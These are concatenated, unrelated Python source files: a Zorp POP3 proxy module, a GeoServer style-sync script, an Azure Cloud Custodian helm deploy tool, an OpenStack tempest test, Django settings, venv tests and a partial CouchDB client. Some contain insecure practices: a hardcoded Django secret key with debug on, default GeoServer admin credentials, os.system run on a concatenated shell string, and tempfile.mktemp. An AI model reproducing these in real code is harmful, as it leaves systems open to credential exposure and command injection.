<synopsis>class NeutralPop3(Pop3Proxy):
def config(self):
Pop3Proxy.config(self)
self.request["GREETING"] = (POP3_REQ_POLICY, None, self.rewriteBanner)
def rewriteBanner(self, response)
self.response_param = "Pop3 server ready"
return POP3_RSP_ACCEPT</synopsis>
</example>
<note>
<para>
Some protocol extensions (most notably APOP) use
random characters in the greeting message as salt in the authentication
process, so changing the banner when APOP is used effectively prevents
APOP from working properly.
</para>
</note>
</section>
<section xml:id="pop3_stacking">
<title>Stacking</title>
<para>
The available stacking modes for this proxy module are listed in the following table. For additional information on stacking, see <xref linkend="proxy_stacking"/>.
</para>
<inline type="actiontuple" target="action.pop3.stk"/>
</section>
<section xml:id="pop3_rejectbymail">
<title>Rejecting viruses and spam</title>
<para>
When filtering messages for viruses or spam, the content vectoring modules reject infected and spam e-mails.
In such cases the POP3 proxy notifies the client about the rejected message in a special e-mail.</para>
<para>To reject e-mail messages using the <parameter>ERR</parameter> protocol element, set the <parameter>reject_by_mail</parameter>
attribute to <parameter>FALSE</parameter>. However, this is not recommended, because several client applications handle
<parameter>ERR</parameter> responses incorrectly.
</para>
<note>
<para>
Infected e-mails are put into the quarantine and deleted from the server.
</para>
</note>
</section>
</section>
<section>
<title>Related standards</title>
<itemizedlist>
<listitem>
<para>
Post Office Protocol Version 3 is described in RFC 1939.
</para>
</listitem>
<listitem>
<para>
The POP3 AUTHentication command is described in RFC 1734.
</para>
</listitem>
</itemizedlist>
</section>
</description>
<metainfo>
<enums>
<enum maturity="stable" id="enum.pop3.req">
<description>
These are in request hashes.
</description>
<item>
<name>POP3_REQ_ACCEPT</name>
</item>
<item>
<name>POP3_REQ_ACCEPT_MLINE</name>
</item>
<item>
<name>POP3_REQ_REJECT</name>
</item>
<item>
<name>POP3_REQ_ABORT</name>
</item>
<item>
<name>POP3_REQ_POLICY</name>
</item>
</enum>
<enum maturity="stable" id="enum.pop3.rsp">
<description>
These are the pop3 response hashes.
</description>
<item>
<name>POP3_RSP_ACCEPT</name>
</item>
<item>
<name>POP3_RSP_REJECT</name>
</item>
<item>
<name>POP3_RSP_ABORT</name>
</item>
</enum>
<enum maturity="stable" id="enum.pop3.stk">
<description>
These are the pop3 proxy stacking capabilities.
</description>
<item>
<name>POP3_STK_NONE</name>
</item>
<item>
<name>POP3_STK_DATA</name>
</item>
<item>
<name>POP3_STK_MIME</name>
</item>
<item>
<name>POP3_STK_POLICY</name>
</item>
</enum>
</enums>
<actiontuples>
<actiontuple maturity="stable" id="action.pop3.req" action_enum="enum.pop3.req">
<description>
Action codes for POP3 requests
</description>
<tuple action="POP3_REQ_ACCEPT">
<args/>
<description>
<para>
Accept the request without any modification.
</para>
</description>
</tuple>
<tuple action="POP3_REQ_ACCEPT_MLINE">
<args/>
<description>
<para>
Accept multiline requests without modification. Use it only if unknown commands has to be enabled (i.e. commands not specified in RFC 1939 or RFC 1734).
</para>
</description>
</tuple>
<tuple action="POP3_REQ_REJECT">
<args>
<string/>
</args>
<description>
<para>
Reject the request. The second parameter contains a string that is sent back to the client.
</para>
</description>
</tuple>
<tuple action="POP3_REQ_POLICY">
<args>METHOD,METHOD</args>
<description>
<para>
Call the function specified to make a decision about the event. See <xref linkend="proxy_policies"/> for details.
This action uses two additional
tuple items, which must be callable Python functions. The first function receives
two parameters: self and command.
</para>
<para>
The second one is called with an answer, (if the answer is multiline, it is called with every line) and receives two parameters: self and response_param.
</para>
</description>
</tuple>
<tuple action="POP3_REQ_ABORT">
<args/>
<description>
<para>
Reject the request and terminate the connection.
</para>
</description>
</tuple>
</actiontuple>
<actiontuple maturity="stable" id="action.pop3.rsp" action_enum="enum.pop3.rsp">
<description>
Action codes for POP3 responses
</description>
<tuple action="POP3_RSP_ACCEPT">
<args></args>
<description>
<para>Accept the response without any modification.
</para>
</description>
</tuple>
<tuple action="POP3_RSP_REJECT">
<args></args>
<description>
<para>Reject the response.
</para>
</description>
</tuple>
<tuple action="POP3_RSP_ABORT">
<args></args>
<description>
<para>Reject the response and terminate the connection.</para>
</description>
</tuple>
</actiontuple>
<actiontuple maturity="stable" id="action.pop3.stk" action_enum="enum.pop3.stk">
<description>
Action codes for proxy stacking
</description>
<tuple action="POP3_STK_POLICY">
<args></args>
<description>
<para>
Call the function specified to decide which part (if any) of the traffic should be passed to the stacked proxy.
</para>
</description>
</tuple>
<tuple action="POP3_STK_NONE">
<args></args>
<description>
<para>
No additional proxy is stacked into the POP3 proxy.
</para>
</description>
</tuple>
<tuple action="POP3_STK_MIME">
<args>
<link id="action.zorp.stack"/>
</args>
<description>
<para>The data part of the traffic including the MIME headers is passed to the specified stacked proxy.
</para>
</description>
</tuple>
<tuple action="POP3_STK_DATA">
<args>
<link id="action.zorp.stack"/>
</args>
<description>
<para>Only the data part of the traffic is passed to the specified stacked proxy.
</para>
</description>
</tuple>
</actiontuple>
</actiontuples>
</metainfo>
</module>
"""
from Zorp import *
from Proxy import Proxy
POP3_REQ_ACCEPT = 1
POP3_REQ_ACCEPT_MLINE = 100
POP3_REQ_REJECT = 3
POP3_REQ_ABORT = 4
POP3_REQ_POLICY = 6
POP3_RSP_ACCEPT = 1
POP3_RSP_REJECT = 3
POP3_RSP_ABORT = 4
POP3_STK_NONE = 1
POP3_STK_DATA = 2
POP3_STK_MIME = 3
POP3_STK_POLICY = 6
class AbstractPop3Proxy(Proxy):
"""<class maturity="stable" abstract="yes">
<summary>
Class encapsulating the abstract POP3 proxy.
</summary>
<description>
<para>
This class implements an abstract POP3 proxy - it serves as a starting point for customized proxy classes, but is itself not directly usable. Service definitions should refer to a customized class derived from AbstractPop3Proxy, or a predefined Pop3Proxy proxy class. AbstractPop3Proxy denies all requests by default.
</para>
</description>
<metainfo>
<attributes>
<attribute maturity="stable">
<name>timeout</name>
<type>
<integer/>
</type>
<default>600000</default>
<conftime>
<read/>
<write/>
</conftime>
<runtime>
<read/>
</runtime>
<description>
Timeout in milliseconds. If no packet arrives within this interval,
connection is dropped.
</description>
</attribute>
<attribute maturity="stable">
<name>username</name>
<type>
<string/>
</type>
<default>n/a</default>
<conftime/>
<runtime>
<read/>
</runtime>
<description>
Username as specified by the client.
</description>
</attribute>
<attribute maturity="stable">
<name>password</name>
<type>
<string/>
</type>
<default></default>
<conftime/>
<runtime>
<read/>
</runtime>
<description>
Password sent to the server (if any).
</description>
</attribute>
<attribute maturity="stable">
<name>max_request_line_length</name>
<type>
<integer/>
</type>
<default>90</default>
<conftime>
<read/>
<write/>
</conftime>
<runtime>
<read/>
</runtime>
<description>
Maximum allowed line length for client requests.
</description>
</attribute>
<attribute maturity="stable">
<name>max_response_line_length</name>
<type>
<integer/>
</type>
<default>512</default>
<conftime>
<read/>
<write/>
</conftime>
<runtime>
<read/>
</runtime>
<description>
Maximum allowed line length for server responses.
</description>
</attribute>
<attribute maturity="stable">
<name>max_username_length</name>
<type>
<integer/>
</type>
<default>8</default>
<conftime>
<read/>
<write/>
</conftime>
<runtime>
<read/>
</runtime>
<description>
Maximum allowed length of usernames.
</description>
</attribute>
<attribute maturity="stable">
<name>max_password_length</name>
<type>
<integer/>
</type>
<default>16</default>
<conftime>
<read/>
<write/>
</conftime>
<runtime>
<read/>
</runtime>
<description>
Maximum allowed length of passwords.
</description>
</attribute>
<attribute maturity="stable">
<name>response_value</name>
<type>
<string/>
</type>
<default>n/a</default>
<conftime/>
<runtime>
<read/>
<write/>
</runtime>
<description>
When a command or response is passed to the policy level, its value can be changed to this value. (It has effect only if the return value is not POP3_*_ACCEPT).
</description>
</attribute>
<attribute maturity="stable">
<name>response_param</name>
<type>
<string/>
</type>
<default>n/a</default>
<conftime/>
<runtime>
<read/>
<write/>
</runtime>
<description>
When a command or response is passed to the policy level, the value its parameters can be changed to this value. (It has effect only if the return value is not POP3_*_ACCEPT).
</description>
</attribute>
<attribute maturity="stable">
<name>response_multiline</name>
<type>
<boolean/>
</type>
<default>n/a</default>
<conftime/>
<runtime>
<read/>
<write/>
</runtime>
<description>
Enable multiline responses.
</description>
</attribute>
<attribute maturity="stable">
<name>request_command</name>
<type>
<string/>
</type>
<default>n/a</default>
<conftime/>
<runtime>
<read/>
<write/>
</runtime>
<description>
When a command is passed to the policy level, its value can be changed to this value.
</description>
</attribute>
<attribute maturity="stable">
<name>request_param</name>
<type>
<string/>
</type>
<default>n/a</default>
<conftime/>
<runtime>
<read/>
<write/>
</runtime>
<description>
When a command is passed to the policy level, the value of its parameters can be changed to this value.
</description>
</attribute>
<attribute maturity="stable">
<name>request</name>
<type>
<hash>
<key>
<string/>
</key>
<value>
<link id="enum.pop3.req"/>
</value>
</hash>
</type>
<default/>
<conftime>
<read/>
<write/>
</conftime>
<runtime>
<read/>
<write/>
</runtime>
<description>
Normative policy hash for POP3 requests
indexed by the command name (e.g.: "USER", "UIDL", etc.). See also <xref linkend="pop3_policies"/>.
</description>
</attribute>
<attribute maturity="stable">
<name>response_stack</name>
<type>
<hash>
<key>
<string/>
</key>
<value>
<link id="action.pop3.stk"/>
</value>
</hash>
</type>
<default/>
<conftime>
<read/>
<write/>
</conftime>
<runtime>
<read/>
<write/>
</runtime>
<description>
Hash containing the stacking policy for multiline POP3 responses. The hash
is indexed by the POP3 response. See also <xref
linkend="pop3_stacking"/>.
</description>
</attribute>
<attribute maturity="stable">
<name>session_timestamp</name>
<type>
<string/>
</type>
<default>n/a</default>
<conftime/>
<runtime>
<read/>
</runtime>
<description>
If the POP3 server implements the APOP command, with the greeting message it sends a timestamp, which is stored in this parameter.
</description>
</attribute>
<attribute maturity="stable">
<name>permit_unknown_command</name>
<type>
<boolean/>
</type>
<default>FALSE</default>
<conftime>
<read/>
<write/>
</conftime>
<runtime>
<read/>
</runtime>
<description>
Enable unknown commands.
</description>
</attribute>
<attribute maturity="stable">
<name>permit_longline</name>
<type>
<boolean/>
</type>
<default>FALSE</default>
<conftime>
<read/>
<write/>
</conftime>
<runtime>
<read/>
</runtime>
<description>
In multiline answer (especially in downloaded messages) sometimes very long lines can appear. Enabling this option allows the unlimited long lines in multiline answers.
</description>
</attribute>
<attribute maturity="stable">
<name>max_authline_count</name>
<type>
<integer/>
</type>
<default>4</default>
<conftime>
<read/>
<write/>
</conftime>
<runtime>
<read/>
</runtime>
<description>
Maximum number of lines that can be sent during the authentication
conversation. The default value is enough for password authentication, but might have to be increased for other types of authentication.
</description>
</attribute>
<attribute maturity="stable">
<name>reject_by_mail</name>
<type>
<boolean/>
</type>
<default>TRUE</default>
<conftime>
<read/>
<write/>
</conftime>
<runtime>
<read/>
</runtime>
<description>
If the stacked proxy or content vectoring module rejects an e-mail message, reply with a special e-mail message instead
of an <parameter>ERR</parameter> response. See <xref linkend="pop3_rejectbymail"/> for details.
</description>
</attribute>
</attributes>
</metainfo>
</class>
"""
name = "pop3"
def __init__(self, session):
"""<method maturity="stable" internal="yes">
<summary>
Initialize a Pop3Proxy instance.
</summary>
<description>
<para>
Create and set up a Pop3Proxy instance.
</para>
</description>
<metainfo>
<arguments>
<argument>
<name>session</name>
<type>SESSION</type>
<description>
session this instance belongs to
</description>
</argument>
</arguments>
</metainfo>
</method>
"""
Proxy.__init__(self, session)
class Pop3Proxy(AbstractPop3Proxy):
"""<class maturity="stable">
<summary>
Default POP3 proxy based on AbstractPop3Proxy.
</summary>
<description>
<para>
Pop3Proxy is the default POP3 proxy based on AbstractPop3Proxy, allowing the most commonly used requests.
</para>
<para>The following requests are permitted: APOP; DELE; LIST; LAST; NOOP; PASS; QUIT; RETR; RSET; STAT; TOP; UIDL; USER; GREETING.
All other requests (including CAPA) are rejected.
</para>
</description>
<metainfo>
<attributes/>
</metainfo>
</class>
"""
def config(self):
"""<method internal="yes">
<summary>
Default config event handler.
</summary>
<description>
<para>
Enables the most common POP3 methods so we have a
useful default configuration.
</para>
</description>
<metainfo>
<arguments/>
</metainfo>
</method>
"""
self.request["APOP"] = POP3_REQ_ACCEPT
self.request["DELE"] = POP3_REQ_ACCEPT
self.request["LIST"] = POP3_REQ_ACCEPT
self.request["LAST"] = POP3_REQ_ACCEPT
self.request["NOOP"] = POP3_REQ_ACCEPT
self.request["PASS"] = POP3_REQ_ACCEPT
self.request["QUIT"] = POP3_REQ_ACCEPT
self.request["RETR"] = POP3_REQ_ACCEPT
self.request["RSET"] = POP3_REQ_ACCEPT
self.request["STAT"] = POP3_REQ_ACCEPT
self.request["TOP"] = POP3_REQ_ACCEPT
self.request["UIDL"] = POP3_REQ_ACCEPT
self.request["USER"] = POP3_REQ_ACCEPT
self.request["CAPA"] = POP3_REQ_REJECT
self.request["*"] = POP3_REQ_REJECT
self.request["GREETING"] = POP3_REQ_ACCEPT
|
'''
gsconfig is a python library for manipulating a GeoServer instance via the GeoServer RESTConfig API.
The project is distributed under a MIT License .
'''
__author__ = "David Winslow"
__copyright__ = "Copyright 2012-2015 Boundless, Copyright 2010-2012 OpenPlans"
__license__ = "MIT"
from geoserver.catalog import Catalog
demo = Catalog("http://localhost:8080/geoserver/rest",
"admin", "geoserver")
live = Catalog("http://localhost:8080/geoserver2/rest",
"admin", "geoserver")
groupname = "Wayne"
prefix = "wayne_"
def resolve(layer, style):
if style is not None:
return (layer, style)
else:
return (layer, demo.get_layer(layer).default_style.name)
g = demo.get_layergroup("groupname")
resolved = [resolve(l, s) for (l, s) in zip(g.layers, g.styles)]
# upload all styles to live
for (l, s) in resolved:
wayne_style = prefix + s
style_on_server = live.get_style(wayne_style)
sld = demo.get_style(s).sld_body
if style_on_server is None:
live.create_style(wayne_style, sld)
else:
style_on_server.update_body(sld)
backup_layernames = {}
# check that all requisite layers exist!
for (l, s) in resolved:
assert live.get_layer(l) is not None or l in backup_layernames, l
lyrs = [backup_layernames.get(x[0], x[0]) for x in resolved]
stls = [(prefix + x[1]) for x in resolved]
wayne_group = live.get_layergroup(groupname)
if wayne_group is None:
wayne_group = live.create_layergroup(groupname)
wayne_group.layers = lyrs
wayne_group.styles = stls
live.save(wayne_group)
|
# Copyright The Cloud Custodian Authors.
# SPDX-License-Identifier: Apache-2.0
import abc
import logging
import os
import re
import tempfile
import click
import yaml
from c7n.resources import load_resources
from c7n.utils import local_session
from c7n_azure.constants import ENV_CONTAINER_QUEUE_NAME, ENV_SUB_ID
from c7n_azure.session import Session
logging.basicConfig(level=logging.INFO, format='%(message)s')
logger = logging.getLogger("c7n_azure.container-host.deploy")
MANAGEMENT_GROUP_TYPE = '/providers/Microsoft.Management/managementGroups'
SUBSCRIPTION_TYPE = '/subscriptions'
class Deployment:
def __init__(self, ctx):
self.dry_run = ctx.parent.params.get('dry_run')
self.deployment_name = ctx.parent.params.get('deployment_name')
self.deployment_namespace = ctx.parent.params.get('deployment_namespace')
self.helm_values_file = ctx.parent.params.get('helm_values_file')
self.helm_set_values = ctx.parent.params.get('helm_set', [])
self.subscription_hosts = []
load_resources()
self.session = local_session(Session)
@abc.abstractmethod
def prepare_subscription_hosts(self):
raise NotImplementedError()
def run(self):
self.prepare_subscription_hosts()
with open(self.helm_values_file, 'r') as values_file:
values = yaml.load(values_file)
sub_hosts = values.setdefault('subscriptionHosts', [])
sub_hosts += self.subscription_hosts
values_file_path = Deployment.write_values_to_file(values)
logger.info("Created values file at {}\n".format(values_file_path))
values_yaml = yaml.dump(values)
logger.info(values_yaml)
# Currently deploy the helm chart through a system command, this assumes helm is installed
# and configured with the target cluster.
logger.info("Deploying with helm")
helm_command = self.build_helm_command(values_file_path)
logger.info(helm_command)
exit_status = os.system(helm_command)
os.remove(values_file_path)
if exit_status:
exit(exit_status)
def add_subscription_host(self, name, environment={}, secret_environment={}):
self.subscription_hosts.append({
'name': name,
'environment': environment,
'secretEnvironment': secret_environment,
})
def build_helm_command(self, values_file_path):
command = 'helm upgrade --install --debug'
if self.dry_run:
command += ' --dry-run'
if self.deployment_namespace:
command += ' --namespace {}'.format(self.deployment_namespace)
command += '\\\n\t --values {}'.format(values_file_path)
for helm_set_value in self.helm_set_values:
command += '\\\n\t --set {}'.format(helm_set_value)
chart_path = os.path.dirname(__file__) or os.getcwd()
command += '\\\n\t {} {}'.format(self.deployment_name, chart_path)
return command
@staticmethod
def sub_name_to_deployment_name(sub_name):
# Deployment names must use only lower case alpha numeric characters, -, _, and .
# They must also start/end with an alpha numeric character
return re.sub(r'[^A-Za-z0-9-\._]+', '-', sub_name).strip('-_.').lower()
@staticmethod
def write_values_to_file(values):
values_file_path = tempfile.mktemp(suffix='.yaml')
with open(values_file_path, 'w') as values_file:
yaml.dump(values, stream=values_file)
return values_file_path
class SubscriptionDeployment(Deployment):
def __init__(self, ctx, subscription_id=None):
super(SubscriptionDeployment, self).__init__(ctx)
self.subscription_id = subscription_id
self.run()
def prepare_subscription_hosts(self):
client = self.session.client('azure.mgmt.subscription.SubscriptionClient')
subscription = client.subscriptions.get(self.subscription_id)
self.add_subscription_host(
Deployment.sub_name_to_deployment_name(subscription.display_name),
{
ENV_SUB_ID: self.subscription_id,
ENV_CONTAINER_QUEUE_NAME: 'c7n-{}'.format(self.subscription_id[-4:])
}
)
class ManagementGroupDeployment(Deployment):
def __init__(self, ctx, management_group_id=None):
super(ManagementGroupDeployment, self).__init__(ctx)
self.management_group_id = management_group_id
self.run()
def prepare_subscription_hosts(self):
self._add_subscription_hosts()
def _add_subscription_hosts(self):
client = self.session.client('azure.mgmt.managementgroups.ManagementGroupsAPI')
info = client.management_groups.get(
self.management_group_id, expand='children', recurse=True)
self._add_subscription_hosts_from_info(info)
def _add_subscription_hosts_from_info(self, info):
if info.type == SUBSCRIPTION_TYPE:
sub_id = info.name # The 'name' field of child info is the subscription id
self.add_subscription_host(
Deployment.sub_name_to_deployment_name(info.display_name),
{
ENV_SUB_ID: sub_id,
ENV_CONTAINER_QUEUE_NAME: 'c7n-{}'.format(info.name[-4:])
},
)
elif info.type == MANAGEMENT_GROUP_TYPE and info.children:
for child in info.children:
self._add_subscription_hosts_from_info(child)
@click.group()
@click.option('--deployment-name', '-d', default='cloud-custodian')
@click.option('--deployment-namespace', '-n', default='cloud-custodian')
@click.option('--helm-values-file', '-v', required=True)
@click.option('--helm-set', '-s', multiple=True)
@click.option('--dry-run/--no-dry-run', default=False)
def cli(deployment_name, deployment_namespace, helm_values_file=None, helm_set=None, dry_run=False):
pass
@cli.command('subscription')
@click.option('--subscription-id', '-i', required=True)
@click.pass_context
class SubscriptionDeploymentCommand(SubscriptionDeployment):
pass
@cli.command('management_group')
@click.option('--management-group-id', '-i', required=True)
@click.pass_context
class ManagementGroupDeploymentCommand(ManagementGroupDeployment):
pass
if __name__ == '__main__':
cli()
|
# Copyright 2013 NEC Corporation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import time
from oslo_log import log as logging
import testtools
from tempest.common.utils import data_utils
from tempest import config
from tempest import exceptions
from tempest.lib import decorators
from tempest.lib import exceptions as lib_exc
from tempest.scenario import manager
from tempest import test
CONF = config.CONF
LOG = logging.getLogger(__name__)
class TestStampPattern(manager.ScenarioTest):
"""The test suite for both snapshoting and attaching of volume
This test is for snapshotting an instance/volume and attaching the volume
created from snapshot to the instance booted from snapshot.
The following is the scenario outline:
1. Boot an instance "instance1"
2. Create a volume "volume1"
3. Attach volume1 to instance1
4. Create a filesystem on volume1
5. Mount volume1
6. Create a file which timestamp is written in volume1
7. Unmount volume1
8. Detach volume1 from instance1
9. Get a snapshot "snapshot_from_volume" of volume1
10. Get a snapshot "snapshot_from_instance" of instance1
11. Boot an instance "instance2" from snapshot_from_instance
12. Create a volume "volume2" from snapshot_from_volume
13. Attach volume2 to instance2
14. Check the existence of a file which created at 6. in volume2
"""
@classmethod
def skip_checks(cls):
super(TestStampPattern, cls).skip_checks()
if not CONF.volume_feature_enabled.snapshot:
raise cls.skipException("Cinder volume snapshots are disabled")
def _create_volume_snapshot(self, volume):
snapshot_name = data_utils.rand_name('scenario-snapshot')
snapshot = self.snapshots_client.create_snapshot(
volume_id=volume['id'], display_name=snapshot_name)['snapshot']
def cleaner():
self.snapshots_client.delete_snapshot(snapshot['id'])
try:
while self.snapshots_client.show_snapshot(
snapshot['id'])['snapshot']:
time.sleep(1)
except lib_exc.NotFound:
pass
self.addCleanup(cleaner)
self.volumes_client.wait_for_volume_status(volume['id'], 'available')
self.snapshots_client.wait_for_snapshot_status(snapshot['id'],
'available')
self.assertEqual(snapshot_name, snapshot['display_name'])
return snapshot
def _wait_for_volume_available_on_the_system(self, ip_address,
private_key):
ssh = self.get_remote_client(ip_address, private_key=private_key)
def _func():
part = ssh.get_partitions()
LOG.debug("Partitions:%s" % part)
return CONF.compute.volume_device_name in part
if not test.call_until_true(_func,
CONF.compute.build_timeout,
CONF.compute.build_interval):
raise exceptions.TimeoutException
@decorators.skip_because(bug="1205344")
@test.idempotent_id('10fd234a-515c-41e5-b092-8323060598c5')
@testtools.skipUnless(CONF.compute_feature_enabled.snapshot,
'Snapshotting is not available.')
@test.services('compute', 'network', 'volume', 'image')
def test_stamp_pattern(self):
# prepare for booting an instance
keypair = self.create_keypair()
security_group = self._create_security_group()
# boot an instance and create a timestamp file in it
volume = self.create_volume()
server = self.create_server(
image_id=CONF.compute.image_ref,
key_name=keypair['name'],
security_groups=security_group,
wait_until='ACTIVE')
# create and add floating IP to server1
ip_for_server = self.get_server_ip(server)
self.nova_volume_attach(server, volume)
self._wait_for_volume_available_on_the_system(ip_for_server,
keypair['private_key'])
timestamp = self.create_timestamp(ip_for_server,
CONF.compute.volume_device_name,
private_key=keypair['private_key'])
self.nova_volume_detach(server, volume)
# snapshot the volume
volume_snapshot = self._create_volume_snapshot(volume)
# snapshot the instance
snapshot_image = self.create_server_snapshot(server=server)
# create second volume from the snapshot(volume2)
volume_from_snapshot = self.create_volume(
snapshot_id=volume_snapshot['id'])
# boot second instance from the snapshot(instance2)
server_from_snapshot = self.create_server(
image_id=snapshot_image['id'],
key_name=keypair['name'],
security_groups=security_group)
# create and add floating IP to server_from_snapshot
ip_for_snapshot = self.get_server_ip(server_from_snapshot)
# attach volume2 to instance2
self.nova_volume_attach(server_from_snapshot, volume_from_snapshot)
self._wait_for_volume_available_on_the_system(ip_for_snapshot,
keypair['private_key'])
# check the existence of the timestamp file in the volume2
timestamp2 = self.get_timestamp(ip_for_snapshot,
CONF.compute.volume_device_name,
private_key=keypair['private_key'])
self.assertEqual(timestamp, timestamp2)
|
"""
Django settings for pedevops project.
Generated by 'django-admin startproject' using Django 1.8.4.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.8/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '2%3tp+p$cu2p)y_%!+u4*mbi5153-6k*jz!s#@t8)6&w!qa*62'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
# 'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'login',
'devops',
'zabbix',
'pems',
'coderelease',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
# 'django.contrib.auth.middleware.AuthenticationMiddleware',
# 'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.security.SecurityMiddleware',
)
ROOT_URLCONF = 'pedevops.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': ['/data/web/Django/pedevops/templates'],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
# 'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'pedevops.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.8/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql',
'NAME': 'pedevops',
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Asia/Shanghai'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.8/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = ['/data/web/Django/pedevops/static']
FILE_CHARSET='utf-8'
DEFAULT_CHARSET='utf-8'
#SESSION_COOKIE_AGE = 43200
SESSION_EXPIRE_AT_BROWSER_CLOSE = True
|
import shutil
import subprocess
import sys
from porcupine.plugins import python_venv
# This test is slow, because making venvs is slow
def test_venv_setting(tmp_path):
assert python_venv.get_venv(tmp_path) is None
subprocess.run([sys.executable, "-m", "venv", "env2"], cwd=tmp_path, check=True)
assert python_venv.get_venv(tmp_path) == tmp_path / "env2"
# Never change venv implicitly, as new venvs are created
subprocess.run([sys.executable, "-m", "venv", "env1"], cwd=tmp_path, check=True)
assert python_venv.get_venv(tmp_path) == tmp_path / "env2"
subprocess.run([sys.executable, "-m", "venv", "env3"], cwd=tmp_path, check=True)
assert python_venv.get_venv(tmp_path) == tmp_path / "env2"
for env in ["env1", "env2", "env1", "env1", "env2", "env2"]:
python_venv.set_venv(tmp_path, tmp_path / env)
assert python_venv.get_venv(tmp_path) == tmp_path / env
def test_venv_becomes_invalid(tmp_path):
subprocess.run([sys.executable, "-m", "venv", "env"], cwd=tmp_path, check=True)
assert python_venv.get_venv(tmp_path) == tmp_path / "env"
shutil.rmtree(tmp_path / "env")
assert python_venv.get_venv(tmp_path) is None
|
# -*- coding: utf-8 -*-
#
# This file is part of couchapp released under the Apache 2 license.
# See the NOTICE for more information.
from __future__ import with_statement
import base64
import itertools
import re
import types
try:
import desktopcouch
except ImportError:
desktopcouch = None
from restkit import Resource, HttpResponse, ResourceError, request
from restkit import util
from restkit.util import oauth2 as oauth
from restkit.filters.oauth2 import OAuthFilter
from couchapp import __version__
from couchapp.errors import ResourceNotFound, ResourceConflict,\
PreconditionFailed, RequestFailed, BulkSaveError, Unauthorized, \
InvalidAttachment
from couchapp.util import json
USER_AGENT = "couchapp/%s" % __version__
aliases = {
'id': '_id',
'rev': '_rev'
}
UNKNOWN_VERSION = tuple()
class CouchdbResponse(HttpResponse):
@property
def json_body(self):
try:
return json.loads(self.body_string())
except ValueError:
return self.body
class CouchdbResource(Resource):
def __init__(self, uri="http://127.0.0.1:5984", **client_opts):
"""Constructor for a `CouchdbResource` object.
CouchdbResource represent an HTTP resource to CouchDB.
@param uri: str, full uri to the server.
"""
client_opts['response_class'] = CouchdbResponse
Resource.__init__(self, uri=uri, **client_opts)
self.safe = ":/%"
def copy(self, path=None, headers=None, **params):
""" add copy to HTTP verbs """
return self.request('COPY', path=path, headers=headers, **params)
def request(self, method, path=None, payload=None, headers=None, **params):
""" Perform HTTP call to the couchdb server and manage
JSON conversions, support GET, POST, PUT and DELETE.
Usage example, get infos of a couchdb server on
http://127.0.0.1:5984 :
import couchdbkit.CouchdbResource
resource = couchdbkit.CouchdbResource()
infos = resource.request('GET')
@param method: str, the HTTP action to be performed:
'GET', 'HEAD', 'POST', 'PUT', or 'DELETE'
@param path: str or list, path to add to the uri
@param data: str or string or any object that could be
converted to JSON.
@param headers: dict, optional headers that will
be added to HTTP request.
@param raw: boolean, response return a Response object
@param params: Optional parameterss added to the request.
Parameterss are for example the parameters for a view. See
`CouchDB View API reference
<http://wiki.apache.org/couchdb/HTTP_view_API>`_ for example.
@return: tuple (data, resp), where resp is an `httplib2.Response`
object and data a python object (often a dict).
"""
headers = headers or {}
headers.setdefault('Accept', 'application/json')
headers.setdefault('User-Agent', USER_AGENT)
try:
return Resource.request(self, method, path=path,
payload=payload, headers=headers, **params)
except ResourceError, e:
msg = getattr(e, 'msg', '')
if e.response and msg:
if e.response.headers.get('content-type') == 'application/json':
try:
msg = json.loads(str(msg))
except ValueError:
pass
if type(msg) is dict:
error = msg.get('reason')
else:
error = msg
if e.status_int == 404:
raise ResourceNotFound(error, http_code=404,
response=e.response)
elif e.status_int == 409:
raise ResourceConflict(error, http_code=409,
response=e.response)
elif e.status_int == 412:
raise PreconditionFailed(error, http_code=412,
response=e.response)
elif e.status_int in (401, 403):
raise Unauthorized(e)
else:
raise RequestFailed(str(e))
except Exception, e:
raise RequestFailed("unknown error [%s]" % str(e))
def couchdb_version(server_uri):
res = CouchdbResource(server_uri)
try:
resp = res.get()
except Exception, e:
return UNKNOWN_VERSION
version = resp.json_body["version"]
t = []
for p in version.split("."):
try:
t.append(int(p))
except ValueError:
continue
return tuple(t)
class Uuids(CouchdbResource):
def __init__(self, uri, max_uuids=1000, **client_opts):
CouchdbResource.__init__(self, uri=uri, **client_opts)
self._uuids = []
self.max_uuids = max_uuids
def next(self):
if not self._uuids:
self.fetch_uuids()
self._uuids, res = self._uuids[:-1], self._uuids[-1]
return res
def __iter__(self):
return self
def fetch_uuids(self):
count = self.max_uuids - len(self._uuids)
resp = self.get('/_uuids', count=count)
self._uuids += resp.json_body['uuids']
class Database(CouchdbResource):
